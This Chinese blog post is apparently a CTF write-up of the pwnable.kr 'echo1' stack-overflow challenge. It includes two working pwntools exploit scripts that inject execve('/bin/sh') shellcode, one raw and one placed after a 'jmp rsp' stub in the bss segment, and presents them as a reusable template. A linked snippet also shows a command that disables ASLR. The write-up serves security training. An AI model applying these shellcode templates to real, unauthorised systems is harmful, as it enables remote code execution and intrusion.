pwnable(echo1)【栈溢出shellcode模板】

最新推荐文章于 2024-06-28 17:00:42 发布
最新推荐文章于 2024-06-28 17:00:42 发布
阅读量783 收藏 1
点赞数
分类专栏: 溢出攻击 漏洞利用技巧
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38204481/article/details/86647666
版权
本文探讨了一种利用shellcode和ROP技术进行攻击的方法,通过分析特定程序的漏洞,提出了两种攻击策略:一是直接导入shellcode并覆盖返回地址;二是修改bss段指令为jmp rsp,再将shellcode置于返回地址后的内存中。文章详细介绍了实验过程及遇到的问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这个题目可以作为一个栈溢出使用shellcode的模板,它除了给出栈溢出,关闭了NX和canary保护其他的什么都没有给。
在这里插入图片描述
这里的溢出,看一下它的上一级
在这里插入图片描述
输入1会执行它。
我的想法是没有地址我就找rop来泄露libc,或者栈的地址

在这里插入图片描述
但是看了一下没有能用的rop
换个思路,导入shellcode,用jmp esp指令作为跳转(这个可以作为导入shellcode的一种通用思路)。
在这里插入图片描述
查了一下ennnnnn程序里面没有jmp esp的rop,但是前面让输入了一个name
在这里插入图片描述
可以看到输入的数据是放到了bss段的。想要实现这个想法还需要bss段是可执行的。
在这里插入图片描述
bss段确实是可执行的,那么2个方案。
1.直接导入shellcode放入bss段,覆盖返回地址位bss段的地址。
但是需要一个小于24字节的shellcode,并且shellcode里面不能有\x20,\x10这样的值,不然会被scanf隔断
顺便保存一个shellcode(是64位的呦)
但是事实证明这种方法是不行的
在这里插入图片描述
这里的赋不是数组的拷贝。

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
id_addr=0x00000000006020A0
local=0

if local:
    p=process("./echo1")
else:
    p=remote("pwnable.kr",9010)
elf=ELF("./echo1")
payload = "A" * (0x20+8) + p64(id_addr)
p.recvuntil("hey, what's your name? : ")
shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
print len(shellcode)
p.sendline(shellcode)
p.recvuntil("> ")
p.sendline("1")
p.recvline()
#gdb.attach(p)
p.sendline(payload)
p.interactive()

2.把bss段上写入jmp rsp。
执行完leave汇编指令之后rsp就会指向返回地址,执行完ret指令之后rsp会指向返回地址之后的部分。
只要把返回地址之后放置位shelllcode就ok了

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
id_addr=0x00000000006020A0
local=0

if local:
    p=process("./echo1")
else:
    p=remote("pwnable.kr",9010)
elf=ELF("./echo1")
payload = "A" * (0x20+8) + p64(id_addr) +asm(shellcraft.sh())
p.recvuntil("hey, what's your name? : ")
print asm("jmp rsp")
p.sendline(asm("jmp rsp"))
p.recvuntil("> ")
p.sendline("1")
p.recvline()
#gdb.attach(p)
p.sendline(payload)
p.interactive()

总结:对于rsp和rbp的应用有2种情况。
1.只能覆盖到rbp,不能覆盖返回地址,解决方案:https://blog.youkuaiyun.com/qq_38204481/article/details/82908422
2.没有shellcode存放的地址,就用 jmp esp

栈溢出攻击示例(shellcode打印/etc/passwd内容)
danxinzhujian的博客
12-02 472
参考:https://blog.youkuaiyun.com/omnispace/article/details/51005934 在实验之前,首先需要关闭操作系统的ASLR,否则每次内存地址都会发生变化。关闭ubuntu操作系统的ASLR需要以root权限执行命令(文件内容默认为2,且操作系统重启后自动恢复): echo 0 > /proc/sys/kernel/randomize_va_space 漏洞代码入下: #include <stdio.h> #include <stdl
CTF——PWN——栈溢出(3.Easy_ShellCode
qq_45215609的博客
09-18 813
CTF——PWN——栈溢出(3.Easy_ShellCode),bss段上的ret2shellcode
pwnable.kr-echo1-Writeup
baikeng3674的博客
09-03 210
pwnable.kr - echo1 - writeup 原文链接:https://www.cnblogs.com/WangAoBo/p/pwnable_kr_echo1.html 旧题新做,发现这道题能用不少姿势 漏洞分析 64位程序,没有开任何保护 pwnable_echo1 [master●●] check echo1 echo1: ELF 64-bit ...
shellcode模板
r250414958的博客
02-12 513
shellcode一直都是漏洞利用关键的一环,关于shellcode怎么编写网上已经有很多优秀的文章,对于利用空间有限的漏洞,往往需要自己精心设计shellcode利用每一个字节的空间,而当漏洞有足够空间让我们发挥的时候再去一条条用汇编设计显然有点效率不足了(dalao除外),这就诞生了后面的shellcode模板 目前我发现好用公开的模板有 TK教主的shellcode模板 https://gi...
pwnable echo1
weixin_30458043的博客
11-03 115
最近忙的好久没有更新了,有空把之前拿来练手的CTF pwn题逐渐整理一下放出来 题目是 linux 64位程序 ,流程很简单,大致思路就是先把一个跳转的机器指令写进name的地址,然后溢出覆盖eip,找一个通用的shellcode就行 转载于:https://www.cnblogs.com/bongbongbong/p/4934624.html...
pwnable.kr】 echo1
子曰小玖的博客
06-10 562
https://r00tnb.github.io/2018/03/06/pwnable.kr-echo1/ 前言 简单的栈溢出题目。 分析 先分析反编译的代码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ...
pwnable.kr 之echo1
Bill
05-30 818
缓冲区溢出新解题目链接:http://pwnable.kr/play.php 分析:该程序是一个64位的elf文件,运行程序.输入name,选择选项.hey, what's your name? : bill - select echo type - - 1. : BOF echo - 2. : FSB echo - 3. : UAF echo - 4. : exit大致流程就这样.看到有三个选项
软件漏洞分析入门:栈溢出Shellcode开发技术详解
最新发布
02-12
尤其强调了Windows平台下利用栈溢出的具体步骤和技术,例如确定shellcode的位置、API的调用方式等,最后以真实存在的CVE案例来展示漏洞重现、分析及利用的全过程。 适合人群:有一定计算机编程和操作系统的初步认识...
栈溢出漏洞之shellcode编写
hgjiayou的博客
01-11 637
什么是栈溢出 会汇编的大佬肯定明白什么是栈溢出,在这里就不多说首先看一段C代码 含有溢出漏洞的C代码 #include <Windows.h> #include <stdio.h> #define PASSWORD "15PB" int VerifyPassword(char* pszPassword, int nSize) { char szBuffer[50] = {0}; memcpy(szBuffer, pszPassword, nSize); r
深入探索:栈溢出Shellcode与安全漏洞
"is903技术手册是一个关于网络安全和漏洞利用的技术文档,主要涵盖了栈溢出shellcode、安全漏洞以及多平台安全等方面的知识。它提供了多个学习资源链接,帮助读者深入理解这些主题。" 栈溢出是网络安全中的一个...
hook模板x86/x64通用版(2)--中转函数的shellcode编写
yes2的专栏
01-27 1801
这个模板的思路是这样的: 1.破坏原地址的指令(至少5字节,此处如果含有跳转会报失败),写一个跳转,被破坏的指令迁移到别的地方; 2.跳转到中转函数,中转函数中会调用用户定义的功能函数; 3.执行原地址被破坏的指令,跳转到原地址的下一指令处。 如果是在API(或普通call)头部进行hook的话,还支持执行API前调用用户定义的“执行前处理函数”,并在执行完API后调用用户定义的“执行后处
shellcode
WEB安全测试学习中……
03-09 1228
<br />Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。<br />另外,Shellcode一般是作为数据发送给受攻击服务的。 <br />Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode的编写。由于漏洞发现者在漏洞发现之初并不会给出完整Shell
栈溢出攻击和shellcode
LittleEmperor
09-16 6366
README 本文默认读者熟悉C语言编程和x86汇编语法,熟悉函数调用过程和调用规约,简单了解linux系统,包括进程内存布局,系统调用和内核内存管理机制,对栈溢出攻击有基本认知。 文章会做一个栈溢出攻击的DEMO,来展示一个典型的shellcode是如何打造,如何工作的。 文章将抛开宏观层面的解释,尽量细致地阐述shellcode的构建过程和异常问题分析等诸多细节,帮助读者把栈溢出攻击和s...
PWN入门学习之简单的栈溢出
2301_80718478的博客
06-28 1352
栈溢出是PWN的一种最简单的漏洞,其最核心的点就是,程序在读取用户输入的时候没有对输入内容进行检测与限制,从而导致输入的数据写入内存时挤占了其它不属于该变量的内存位置,从而导致重要寄存器(如RBP、RIP)中记录的地址被破坏,导致函数执行完返回时发生错误(找不到这样一个地址),即发生段错误(Segment fault)。但是同时,我们可以利用改写RBP、RIP寄存器值的这一特性,将程序跳转至我们期望的地方去。
编写"优美"的SHELLCODE
jincm的专栏
12-31 2899
编写"优美"的SHELLCODE 作者:watercloud   主页:http://www.nsfocus.com 日期:2002-1-4     SHELLCODE的活力在于其功能,如果在能够完成功能的前提下又能比较"优美",那么就 更能体现shellcode的魅力. 个人认为shellcode的优美能在两个地方表现:     shellcode本身应该尽量的短小.
用angr找到strcpy的栈溢出漏洞
^_^
06-29 1047
这篇文章其实是分析angr文档里给出的一个挖漏洞的小例子。 原文链接在此:https://docs.angr.io/examples#beginner-vulnerability-discovery-example-strcpy_find 这是第一个用angr在二进制里找可利用条件的教程。第一个例子是一个非常简单的程序。这个angr脚本会从程序的entry到strcpy找到一条路径。(只有我们能够控制strcpy的参数的时候) 为了找到正确的路径,angr需要去算一个密码参数,算这个密码,angr只要2s
pwnable.kr 之asm
Bill
04-30 2232
一个真正的高手应该学会写shellcode. 首先查看c代码:#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #include <sys/prctl.h> #include <fcntl.h> #include <unistd.h>#defin
缓冲区溢出基础实践()——shellcode 与 ret2libc
weixin_34212189的博客
06-11 606
  最近结合软件安全课程上学习的理论知识和网络资料,对缓冲区溢出漏洞的简单原理和利用技巧进行了一定的了解。这里主要记录笔者通过简单的示例程序实现缓冲区溢出漏洞利用的步骤,按由简至繁的顺序,依次描述简单的 shellcode、ret2libc、ROP、Hijack GOT 等缓冲区溢出攻击技术的原理和步骤,以供总结和分享。为了保证缓冲区溢出实践能够顺利进行,需要对编译器选项和操作系统环境进行设置,可...
ShellCode
weixin_30954607的博客
08-13 380
典型栈溢出A-代码分析ShellCode-A#include "pch.h"#include <iostream>#include <Windows.h>#define PASSWORD "15PB"// GS: 用于判断当前是否产生了溢出,依赖的是检查安全 cookie, CheckStackValue// inline: 没有关闭代码优化,导致一些简单的代码被...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值